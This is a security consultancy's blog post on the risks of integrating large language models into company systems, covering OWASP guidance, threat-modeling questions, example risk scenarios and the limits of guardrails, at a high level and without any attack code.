Add your offcanvas content in here

The Company

Simplifying your IT-security journey.

Knowledge & News

Secure Integration of Large Language Models: Understanding Risks and Developing Protective Measures

March 4, 2025 |
Kategorie: News

Large Language Models (LLMs) like ChatGPT or similar AI systems open up a multitude of possibilities for companies. Whether as a customer chatbot, code assistant, or knowledge database, the potential applications seem limitless. However, significant risks accompany these opportunities. We shed light on the matter, highlight the security risks associated with the use of LLMs, and show how companies can minimize them.

The Security of LLMs: An Underestimated Challenge

When considering attacks on LLM applications, terms like “Prompt Injection” and “Jailbreaking” often come to mind, but there are many other threats. Often, a comprehensive understanding of how to assess these risks in the context of secure operation within the company's infrastructure (on-prem, in the cloud, or hybrid) is lacking.

The key to using LLMs securely is to apply long-established security practices together with new risk catalogs. The OWASP Top 10 for LLMs (https://genai.owasp.org/llm-top-10/) provides a solid foundation here. Together with the established Threat Modeling Process from OWASP (https://owasp.org/www-community/Threat_Modeling_Process), we can identify risks for LLM applications in a structured approach and create recommendations for securing applications.

LLMs are special building blocks of an application

The security of applications based on Large Language Models depends largely on the respective functional scope of the application. For the security analysis, one must ask the following questions, among others:

  • In which environment is the LLM used? Every infrastructure (on-prem, cloud, hybrid) brings its own security requirements and challenges.
  • What sensitive data is being managed? Companies must ensure that personal or business-critical data to which the LLM has access is optimally protected and subject to robust data protection measures.
  • What are the LLM's outputs used for? Whether for supporting decision-making processes, as a direct customer interface, or for generating code – each type of application requires different security precautions.
  • Can the LLM operate autonomously? The ability of an LLM to act autonomously can significantly increase its utility. At the same time, however, this also multiplies potential security risks, as serious consequences can result in the event of errors or manipulation attempts.
  • How can the supply chain be secured? When using models from external sources, the trustworthiness of the supply chain must be ensured.

Vulnerabilities in the integration of LLMs can lead to serious problems, such as:

  • A developer has code generated by an LLM without sufficient review, which leads to the generated code containing malicious code, which in turn opens backdoors for attacks in the application.
  • An LLM with access to internal information, such as the company wiki, could be manipulated by an attacker to unintentionally disclose confidential data.
  • An attacker manipulates an open-source model and uploads it to an LLM repository. The model is manipulated to insult the user under certain circumstances. If the model is used by the company, significant reputational damage may result.

The problem with protective measures

Often, the first line of defense against attacks is to block unwanted topics or implement guardrails. While these measures initially provide a sense of security, they do not offer 100% protection. On the contrary, this perceived sense of security can lead to overlooking actual vulnerabilities. For this reason, protection mechanisms must be clearly defined and firmly embedded in the security strategy, tailored to the specific LLM, the application, the underlying infrastructure, and the specific use case.

Conclusion and outlook

The implementation of LLMs in companies holds immense potential, but also significant security risks. With proven methods and our decades of experience, we can identify the new threats and risks and apply appropriate mitigation strategies at the LLM, application, and infrastructure level, holistically integrated into the system.

The Author

Benjamin Weller

Benjamin Weller is a security consultant and penetration tester. As a trainer, he imparts practical security knowledge and understanding to development teams. Since 2022, he has been working on generative AI models and their impact – in the realm of data security, data protection, and on society.